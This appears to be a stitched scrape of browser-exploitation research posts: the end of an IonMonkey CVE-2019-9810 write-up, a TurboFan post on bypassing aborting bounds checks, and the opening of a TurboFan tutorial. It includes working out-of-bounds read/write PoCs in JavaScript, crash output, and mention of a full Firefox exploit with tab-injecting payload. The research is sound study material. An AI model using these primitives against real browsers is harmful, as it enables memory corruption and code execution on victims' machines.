class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

Conclusion

It has been quite some time that I’ve wanted to look at IonMonkey and this was a good opportunity (and a good spot to stop for now!).. We have covered quite a bit of content but obviously the engine is even more complicated as there are a bunch of things I haven't really studied yet.

At least we have uncovered the secrets of CVE-2019-9810 and its PoC as well as developed a few more commands for sm.js. For those that are interested in the exploit, you can find it here: CVE-2019-9810. It exploits Firefox on Windows 64-bit, loads a reflective-dll that embeds the payload. The payload infects the other tabs and sets-up a hook to inject arbitrary JavaScript. The demo payload changes the background of every visited website by the blog's background theme as well as redirecting every link to doar-e.github.io :).

If this was interesting for you, you might want to have a look at those other good resources concerning IonMonkey:

As usual, big up to my mates @yrp604 and @__x86 for proofreading this article.

And if you want a bit more, what follows is a bunch of extra questions you might have asked yourself while reading that I answer (but that did not really fit the overall narrative) as well as a few puzzles if you want to explore Ion even more!

Little puzzles & extra quests

As said above, here are a bunch of extra questions / puzzles that did not really fit in the narrative. This does not mean they are not interesting so I just decided to stuff them here :).

Why does AccessArray(10) triggers a bailout?

let Arr = null;
function AccessArray(Idx) {
    Arr[Idx] = 0xaaaaaaaa;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1);
}

AccessArray(10);

Can the write out-of-bounds be transformed into an information disclosure?

It can! We can abuse the loadelement MIR instruction the same way we abused storeelement in which case we can read out-of-bounds memory.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    print(Target(Snowflake, 0x6));
}

main();

What's a good way to check if the engine is vulnerable?

The most reliable way to check if the engine is vulnerable that I found is to actually use the vulnerability as out-of-bounds read to go and attempt to read out-of-bounds. At this point, there are two possible outcomes: correct execution should return undefined as the array has a size of 0, or you read leftover data in which case it is vulnerable.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
    Arr[Idx];
    Special.slice();
    return Arr[Idx];
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7);
    Arr.fill(1337);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x0);
    }

    Trigger = true;
    const Ret = Target(Snowflake, 0x5);
    if(Ret === undefined) {
        print(':( not vulnerable');
    } else {
        print(':) vulnerable');
    }
}

main();

Can you write something bigger than a simple uint32?

In the blogpost, we focused on the integer JSValue out-of-bounds write, but you can also use it to store an arbitrary qword. Here is an example writing 0x44332211deadbeef!

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 4e-324;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x21);
    Arr.fill(0);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0, 5e-324);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 352943125510189150000);
}

main();

And here is the crash you should get eventually:

(e08.36ac): Access violation - code c0000005 (!!! second chance !!!)
mozglue!arena_dalloc+0x11:
00007ffc`773323a1 488b3e          mov     rdi,qword ptr [rsi] ds:44332211`dea00000=????????????????

0:000> dv /v aPtr
@rcx                         aPtr = 0x44332211`deadbeef

Why does using 0xdeadbeef as a value triggers a bailout?

let Arr = null;
function AccessArray(Idx, Value) {
    Arr[Idx] = Value;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
    AccessArray(1, 0xaa);
}

AccessArray(1, 0xdead);
print('dead worked!');
AccessArray(1, 0xdeadbeef);

Circumventing Chrome's hardening of typer bugs

Introduction

Some recent Chrome exploits were taking advantage of Bounds-Check-Elimination in order to get a R/W primitive from a TurboFan's typer bug (a bug that incorrectly computes type information during code optimization). Indeed during the simplified lowering phase when visiting a CheckBounds node if the engine can guarantee that the used index is always in-bounds then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bound checks. It means that CheckBounds will never get removed during simplified lowering. As mentioned by Mark Brand's article on the Google Project Zero blog and tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5
Author: Jaroslav Sevcik <[email protected]>
Date:   Fri Feb 8 16:26:18 2019 +0100

    [turbofan] Introduce aborting bounds checks.

    Instead of eliminating bounds checks based on types, we introduce
    an aborting bounds check that crashes rather than deopts.

    Bug: v8:8806
    Change-Id: Icbd9c4554b6ad20fe4135b8622590093679dac3f
    Reviewed-on: https://chromium-review.googlesource.com/c/1460461
    Commit-Queue: Jaroslav Sevcik <[email protected]>
    Reviewed-by: Tobias Tebbi <[email protected]>
    Cr-Commit-Position: refs/heads/master@{#59467}

Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          CheckBoundsParameters::Mode mode =
              CheckBoundsParameters::kDeoptOnOutOfBounds;
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            mode = CheckBoundsParameters::kAbortOnOutOfBounds;         // [1]
          }
          NodeProperties::ChangeOp(
              node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
        }
// [...]
  }

Before the commit, if condition [1] happens, the bound check would have been removed using a call to DeferReplacement(node, node->InputAt(0));. Now, what happens instead is that the node gets lowered to a CheckedUint32Bounds with a AbortOnOutOfBounds mode [2].

Effect linearization

When the effect control linearizer (one of the optimization phase) kicks in, here is how the CheckedUint32Bounds gets lowered :

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
                                                        Node* frame_state) {
  Node* index = node->InputAt(0);
  Node* limit = node->InputAt(1);
  const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

  Node* check = __ Uint32LessThan(index, limit);
  switch (params.mode()) {
    case CheckBoundsParameters::kDeoptOnOutOfBounds:
      __ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
                         params.check_parameters().feedback(), check,
                         frame_state, IsSafetyCheck::kCriticalSafetyCheck);
      break;
    case CheckBoundsParameters::kAbortOnOutOfBounds: {
      auto if_abort = __ MakeDeferredLabel();
      auto done = __ MakeLabel();

      __ Branch(check, &done, &if_abort);

      __ Bind(&if_abort);
      __ Unreachable();
      __ Goto(&done);

      __ Bind(&done);
      break;
    }
  }

  return index;
}

Long story short, the CheckedUint32Bounds is replaced by an Uint32LessThan node (plus the index and limit nodes). In case of an out-of-bounds there will be no deoptimization possible but instead we will reach an Unreachable node.

During instruction selection Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {
  OperandGenerator g(this);
  Emit(kArchDebugBreak, g.NoOutput());
}

Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {
  let arr = [1,2,3,4];
  let badly_typed = 0;
  let idx = badly_typed * 5;
  return arr[idx];
};
opt_me();
%OptimizeFunctionOnNextCall(opt_me);
opt_me();

With this example, we're going to observe a few things:

  • simplified lowering does not remove the CheckBounds node as it would have before,
  • the lowering of this node and how it leads to the creation of an Unreachable node,
  • eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds

Without surprise, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.

typer

CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.

simplified_lowering

Effect Linearization : CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

effect_linearization_schedule

effect_linearization

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.

Late optimization : MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). In the case of Uint32LessThan being replaced by a constant node the rest of the code, including the Unreachable node, will be removed by the dead code elimination. Therefore, no bounds check remains and no breakpoint will ever be reached, regardless of any OOB accesses that are attempted.

// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
  switch (node->opcode()) {
// [...]
      case IrOpcode::kUint32LessThan: {
      Uint32BinopMatcher m(node);
      if (m.left().Is(kMaxUInt32)) return ReplaceBool(false);  // M < x => false
      if (m.right().Is(0)) return ReplaceBool(false);          // x < 0 => false
      if (m.IsFoldable()) {                                    // K < K => K
        return ReplaceBool(m.left().Value() < m.right().Value());
      }
      if (m.LeftEqualsRight()) return ReplaceBool(false);  // x < x => false
      if (m.left().IsWord32Sar() && m.right().HasValue()) {
        Int32BinopMatcher mleft(m.left().node());
        if (mleft.right().HasValue()) {
          // (x >> K) < C => x < (C << K)
          // when C < (M >> K)
          const uint32_t c = m.right().Value();
          const uint32_t k = mleft.right().Value() & 0x1F;
          if (c < static_cast<uint32_t>(kMaxInt >> k)) {
            node->ReplaceInput(0, mleft.left().node());
            node->ReplaceInput(1, Uint32Constant(c << k));
            return Changed(node);
          }
          // TODO(turbofan): else the comparison is always true.
        }
      }
      break;
    }
// [...]

final_replacement_of_bound_check

Final scheduling : no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

scheduling

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

final_asm

To sum up :

  1. arr[good_idx] leads to the creation of a CheckBounds node in the early phases
  2. during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds
  3. The CheckedUint32Bounds gets replaced by several nodes during "effect linearization" : Uint32LessThan and Unreachable
  4. Uint32LessThan is constant folded during the "Late Optimization" phase
  5. The Unreachable node is removed during dead code elimination of the "Late Optimization" phase
  6. Only a simple Load remains during the final scheduling
  7. Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is: Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#astIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string with a length of kMaxLength, the computed Range type will be kMaxLength - 1 while it is actually kMaxLength.

const str = "____"+"DOARE".repeat(214748359);
String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength

We can then amplify this typing error.

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30; // type is Range(0,0) instead of Range(1,1)

If all of this seems unclear, check my previous introduction to TurboFan and my github.

Now, consider the following trigger poc :

SUCCESS = 0;
FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {
  const OOB_OFFSET = 5;

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
  badly_typed = Math.abs(Math.abs(badly_typed) + 25);
  badly_typed = badly_typed >> 30;

  let bad = badly_typed * OOB_OFFSET;
  let leak = 0;

  if (bad >= OOB_OFFSET && ++it < 0x10000) {
    leak = 0;
  }
  else {
    let arr = new Array(1.1,1.1);
    arr2 = new Array({},{});
    leak = arr[bad];
    if (leak != undefined) {
      return leak;
    }
  }
  return FAILURE;
};

let res = opt_me();
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
%DisassembleFunction(opt_me); // prints nothing on release builds
for (let i = 0; i < 0x10000; ++i)
  res = opt_me();
print(res);
%DisassembleFunction(opt_me); // prints nothing on release builds

Checkout the result :

$ d8 poc.js
1.5577100569205e-310

It worked despite those aborting bound checks. Why? The line leak = arr[bad] didn’t lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction).

Native context specialization of an element access

The answer lies in the native context specialization. This is one of the early optimization phase where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute.

One of the first optimization phase is the inlining phase, that includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess.

There is one case that looks very interesting when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.

    } else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
               CanTreatHoleAsUndefined(receiver_maps)) {
      // Check that the {index} is a valid array index, we do the actual
      // bounds check below and just skip the store below if it's out of
      // bounds for the {receiver}.
      index = effect = graph()->NewNode(
          simplified()->CheckBounds(VectorSlotPair()), index,
          jsgraph()->Constant(Smi::kMaxValue), effect, control);
    } else {

In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue.

The actual bound checking nodes are added as follows:

      if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
          CanTreatHoleAsUndefined(receiver_maps)) {
        Node* check =
            graph()->NewNode(simplified()->NumberLessThan(), index, length);       // [1]
        Node* branch = graph()->NewNode(
            common()->Branch(BranchHint::kTrue,
                             IsSafetyCheck::kCriticalSafetyCheck),
            check, control);

        Node* if_true = graph()->NewNode(common()->IfTrue(), branch);              // [2]
        Node* etrue = effect;
        Node* vtrue;
        {
          // Perform the actual load
          vtrue = etrue =
              graph()->NewNode(simplified()->LoadElement(element_access),          // [3]
                               elements, index, etrue, if_true);

        // [...]
        }

      // [...]
      }

In a nutshell, with this mode :

  • CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF),
  • A NumberLessThan node is generated,
  • An IfTrue node is generated,
  • In the "true" branch, there will be a LoadElement node.

The length used by the NumberLessThan node comes from a previously generated LoadField:

    Node* length = effect =
        receiver_is_jsarray
            ? graph()->NewNode(
                  simplified()->LoadField(
                      AccessBuilder::ForJSArrayLength(elements_kind)),
                  receiver, effect, control)
            : graph()->NewNode(
                  simplified()->LoadField(AccessBuilder::ForFixedArrayLength()),
                  elements, effect, control);

All of this means that TurboFan does generate some bound checking nodes but there won't be any aborting bound check because of the kMaxValue length being used (well technically there is, but the maximum length is unlikely to be reached!).

Type narrowing and constant folding of NumberLessThan

After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TyperNarrowingReducer is going to change the type [2] with op_typer_.singleton_true() [1].

    case IrOpcode::kNumberLessThan: {
      // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
      // comparisons with the operation typer).
      Type left_type = NodeProperties::GetType(node->InputAt(0));
      Type right_type = NodeProperties::GetType(node->InputAt(1));
      if (left_type.Is(Type::PlainNumber()) &&
          right_type.Is(Type::PlainNumber())) {
        if (left_type.Max() < right_type.Min()) {
          new_type = op_typer_.singleton_true();              // [1]
        } else if (left_type.Min() >= right_type.Max()) {
          new_type = op_typer_.singleton_false();
        }
      }   
      break;
    }   
  // [...]
  Type original_type = NodeProperties::GetType(node);
  Type restricted = Type::Intersect(new_type, original_type, zone());
  if (!original_type.Is(restricted)) {
    NodeProperties::SetType(node, restricted);                 // [2]
    return Changed(node);
  } 

Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  // Check if the output type is a singleton.  In that case we already know the
  // result value and can simply replace the node if it's eliminable.
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable)) {
    // TODO(v8:5303): We must not eliminate FinishRegion here. This special
    // case can be removed once we have separate operators for value and
    // effect regions.
    if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();
    // We can only constant-fold nodes here, that are known to not cause any
    // side-effect, may it be a JavaScript observable side-effect or a possible
    // eager deoptimization exit (i.e. {node} has an operator that doesn't have
    // the Operator::kNoDeopt property).
    Type upper = NodeProperties::GetType(node);
    if (!upper.IsNone()) {
      Node* replacement = nullptr;
      if (upper.IsHeapConstant()) {
        replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());
      } else if (upper.Is(Type::MinusZero())) {
        Factory* factory = jsgraph()->isolate()->factory();
        ObjectRef minus_zero(broker(), factory->minus_zero_value());
        replacement = jsgraph()->Constant(minus_zero);
      } else if (upper.Is(Type::NaN())) {
        replacement = jsgraph()->NaNConstant();
      } else if (upper.Is(Type::Null())) {
        replacement = jsgraph()->NullConstant();
      } else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) {
        replacement = jsgraph()->Constant(upper.Min());
      } else if (upper.Is(Type::Undefined())) {
        replacement = jsgraph()->UndefinedConstant();
      }   
      if (replacement) {
        // Make sure the node has a type.
        if (!NodeProperties::IsTyped(replacement)) {
          NodeProperties::SetType(replacement, upper);
        }
        ReplaceWithValue(node, replacement);
        return Changed(replacement);
      }   
    }
  }
  return NoChange();
}

We confirm this behaviour using --trace-turbo-reduction:

- In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer
- Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer

At this point, there isn't any proper bound check left.

Observing the generated assembly

Let's run again the previous poc. We'll disassemble the function twice.

The first optimized code we can observe contains code related to:

  • a CheckedBounds with a length of MaxValue,
  • a bound check with a NumberLessThan with the correct length.
                =====   FIRST DISASSEMBLY  ===== 

0x11afad03119   119  41c1f91e       sarl r9, 30              // badly_typed >> 30
0x11afad0311d   11d  478d0c89       leal r9,[r9+r9*4]        // badly_typed * OOB_OFFSET

0x11afad03239   239  4c894de0       REX.W movq [rbp-0x20],r9

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
0x11afad0326f   26f  817de0ffffff7f cmpl [rbp-0x20],0x7fffffff
0x11afad03276   276  0f830c010000   jnc 0x11afad03388  <+0x388> // go to Unreachable

// NumberLessThan (badly_typed, LoadField(array.length) = 2)
0x11afad0327c   27c  837de002       cmpl [rbp-0x20],0x2
0x11afad03280   280  0f8308010000   jnc 0x11afad0338e  <+0x38e>

// LoadElement
0x11afad03286   286  4c8b45e8       REX.W movq r8,[rbp-0x18]  // FixedArray
0x11afad0328a   28a  4c8b4de0       REX.W movq r9,[rbp-0x20]  // badly_typed * OOB_OFFSET
0x11afad0328e   28e  c4817b1044c80f vmovsd xmm0,[r8+r9*8+0xf] // arr[bad]

// Unreachable
0x11afad03388   388  cc             int3l // Unreachable node

The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!

                     =====  SECOND DISASSEMBLY  ===== 

335 0x2e987c30412f   10f  c1ff1e         sarl rdi, 30 // badly_typed >> 30
336 0x2e987c304132   112  4c8d4120       REX.W leaq r8,[rcx+0x20]
337 0x2e987c304136   116  8d3cbf         leal rdi,[rdi+rdi*4] // badly_typed * OOB_OFFSET

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
400 0x2e987c304270   250  81ffffffff7f   cmpl rdi,0x7fffffff
401 0x2e987c304276   256  0f83b9000000   jnc 0x2e987c304335  <+0x315>
402 0x2e987c30427c   25c  c5fb1044f90f   vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access!

441 0x2e987c304335   315  cc             int3l  // Unreachable node

You can confirm it works by launching the full exploit on a patched 7.5 d8 shell.

Conclusion

As discussed in this article, the introduction of aborting CheckBounds kind of kills the CheckBound elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan would defer the bound checking to a NumberLessThan node that would then be incorrectly constant folded because of a bad typing.

Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86.

Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review.

Also, if you're interested in TurboFan, don't miss out my future typhooncon talk!

A bit before publishing this post, saelo released a new phrack article on jit exploitation as well as the slides of his 0x41con talk.

References

Introduction to TurboFan

Introduction

Ages ago I wrote a blog post here called first dip in the kernel pool, this year we're going to swim in a sea of nodes!

The current trend is to attack JavaScript engines and more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT.

In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses.

Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We’ll be doing that on a x64 Linux box but it really is the exact same exploitation for Windows platforms (simply use a different shellcode!).

If you want to follow along, you can check out the associated repo.

Table of contents:

Setup

Building v8

Building v8 is very easy. You can simply fetch the sources using depot tools and then build using the following commands:

fetch v8
gclient sync
./build/install-build-deps.sh
tools/dev/gm.py x64.release

Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly.

The d8 shell

A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell:

~/v8$  ./tools/dev/gm.py x64.release d8

Try it:

~/v8$ ./out/x64.release/d8 
V8 version 7.3.0 (candidate)
d8> print("hello doare")
hello doare

Many interesting flags are available. List them using d8 --help.

In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example:

$ d8 --allow-natives-syntax
V8 version 7.3.0 (candidate)
d8> let a = new Array('d','o','a','r','e')
undefined
d8> %DebugPrint(a)
DebugPrint: 0x37599d40aee1: [JSArray]
 - map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x39ea1928fdb1 <JSArray[0]>
 - elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS]
 - length: 5
 - properties: 0x0dfc80380c19 <FixedArray[0]> {
    #length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x37599d40af11 <FixedArray[5]> {
           0: 0x39ea1929d8d9 <String[#1]: d>
           1: 0x39ea1929d8f1 <String[#1]: o>
           2: 0x39ea1929d8c1 <String[#1]: a>
           3: 0x39ea1929d909 <String[#1]: r>
           4: 0x39ea1929d921 <String[#1]: e>
 }
0x1717e082d91: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: PACKED_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)>
 - prototype_validity cell: 0x373148680601 <Cell value= 1>
 - instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]>
 - layout descriptor: (nil)
 - transitions #1: 0x39ea192909c1 <TransitionArray[4]>Transition array #1:
     0x0dfc80384b71 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)>
 - prototype: 0x39ea1928fdb1 <JSArray[0]>
 - constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)>
 - dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

["d", "o", "a", "r", "e"]

If you want to know about existing runtime functions, simply go to src/runtime/ and grep on all the RUNTIME_FUNCTION (this is the macro used to declare a new runtime function).

Preparing Turbolizer

Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph.

cd tools/turbolizer
npm i
npm run-script build
python -m SimpleHTTPServer

When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit to a specific function), a .cfg and a .json files are generated so that you can get a graph view of different optimization passes using Turbolizer.

Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface.

Compilation pipeline

Let's take the following code.

let f = (o) => {
  var obj = [1,2,3];
  var x = Math.ceil(Math.random());
  return obj[o+x];
}

for (let i = 0; i < 0x10000; ++i) {
 f(i); 
}

We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below.

$ d8 pipeline.js  --trace-opt
[marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)]
[marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)]
[compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan]
[optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms]
[completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>]
[compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR]
[optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms]

We can look at the code object of the function before and after optimization using %DisassembleFunction.

// before
0x17de4c02061: [Code]
 - map: 0x0868f07009d9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0x7ffd9c25d340
// after
0x17de4c82d81: [Code]
 - map: 0x0868f07009d9 <Map>
kind = OPTIMIZED_FUNCTION
stack_slots = 8
compiler = turbofan
address = 0x7ffd9c25d340

What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code.

Ignition instructions gather type feedback that will help for TurboFan's speculative optimizations. Speculative optimization means that the code generated will be made upon assumptions.

For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by Turbofan will expect Player objects and will be very fast for this case.

class Player{}
class Wall{}
function move(o) {
    // ...
}
player = new Player();
move(player)
move(player)
...
// ... optimize code! the move function handles very fast objects of type Player
move(player) 

However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, it needs to be destroyed and some ignition bytecode will be generated instead. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player, TurboFan will take this into account and optimize again the code accordingly.

Let's observe this behaviour using --trace-opt and --trace-deopt !

class Player{}
class Wall{}

function move(obj) {
  var tmp = obj.x + 42;
  var x = Math.random();
  x += 1;
  return tmp + x;
}

for (var i = 0; i < 0x10000; ++i) {
  move(new Player());
}
move(new Wall());
for (var i = 0; i < 0x10000; ++i) {
  move(new Wall());
}
$ d8 deopt.js  --trace-opt --trace-deopt
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]
[deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98]
            ;;; deoptimize at <deopt.js:5:17>, wrong map
// [...]
[deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms]
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]

The log clearly shows that when encountering the Wall object with a different map (understand "type") it deoptimizes because the code was only meant to deal with Player objects.

If you are interested to learn more about this, I recommend having a look at the following ressources: TurboFan Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources.

Sea of Nodes

